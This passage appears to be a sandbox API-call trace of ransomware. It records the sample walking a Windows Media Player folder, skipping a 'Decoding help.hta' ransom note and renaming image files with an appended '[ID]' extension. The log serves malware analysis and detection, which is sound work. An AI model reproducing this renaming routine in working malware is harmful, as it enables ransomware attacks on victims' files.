out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp" [0042.814] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0042.814] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw48.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw48.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.814] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3fdea9, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3fdea9, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2aa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw48.jpg", cAlternateFileName="")) returned 1 [0042.815] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.815] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.815] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.815] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_bw48.jpg") returned -1 [0042.815] lstrlenW (lpString="wmpnss_bw48.jpg") returned 15 [0042.815] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.815] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.815] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_bw48.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg" [0042.815] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg" [0042.815] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0042.815] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw48.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw48.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.815] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3fdea9, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3fdea9, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x101c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw48.png", cAlternateFileName="")) returned 1 [0042.815] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.815] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.815] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.815] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_bw48.png") returned -1 [0042.815] lstrlenW (lpString="wmpnss_bw48.png") returned 15 [0042.815] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.815] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.815] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_bw48.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png" [0042.815] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png" [0042.816] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.[ID]g9uZrLhJaygpwRm1[ID]" [0042.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw48.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw48.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.830] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3fdea9, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3fdea9, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5788, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color120.jpg", cAlternateFileName="")) returned 1 [0042.830] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.830] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.830] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.830] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.830] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_color120.jpg") returned -1 [0042.830] lstrlenW (lpString="wmpnss_color120.jpg") returned 19 [0042.831] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.831] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.831] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_color120.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg" [0042.831] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg" [0042.831] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0042.831] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color120.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color120.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.831] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf424006, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf424006, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2f4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color120.png", cAlternateFileName="")) returned 1 [0042.831] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.831] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.831] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.831] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.831] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_color120.png") returned -1 [0042.831] lstrlenW (lpString="wmpnss_color120.png") returned 19 [0042.831] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.831] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.831] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_color120.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png" [0042.831] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png" [0042.831] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.[ID]g9uZrLhJaygpwRm1[ID]" [0042.831] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color120.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color120.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.831] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf424006, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf424006, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc38, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color32.bmp", cAlternateFileName="")) returned 1 [0042.832] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.832] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.832] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.832] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_color32.bmp") returned -1 [0042.832] lstrlenW (lpString="wmpnss_color32.bmp") returned 18 [0042.832] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.832] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.832] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_color32.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.bmp") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.bmp" [0042.832] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.bmp") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.bmp" [0042.832] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0042.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.bmp" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color32.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color32.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.832] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf44a163, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf44a163, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x24cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color32.jpg", cAlternateFileName="")) returned 1 [0042.832] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.832] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.832] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.832] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_color32.jpg") returned -1 [0042.832] lstrlenW (lpString="wmpnss_color32.jpg") returned 18 [0042.832] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.832] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.832] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_color32.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg" [0042.833] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg" [0042.833] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0042.833] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color32.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color32.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color32.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.853] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf44a163, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf44a163, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1b38, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color48.bmp", cAlternateFileName="")) returned 1 [0042.853] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.853] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.853] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.854] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_color48.bmp") returned -1 [0042.854] lstrlenW (lpString="wmpnss_color48.bmp") returned 18 [0042.854] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.854] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.854] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_color48.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.bmp") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.bmp" [0042.854] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.bmp") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.bmp" [0042.854] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0042.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.bmp" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color48.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color48.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color48.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.854] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf44a163, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf44a163, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2c85, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color48.jpg", cAlternateFileName="")) returned 1 [0042.854] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.854] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.854] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", 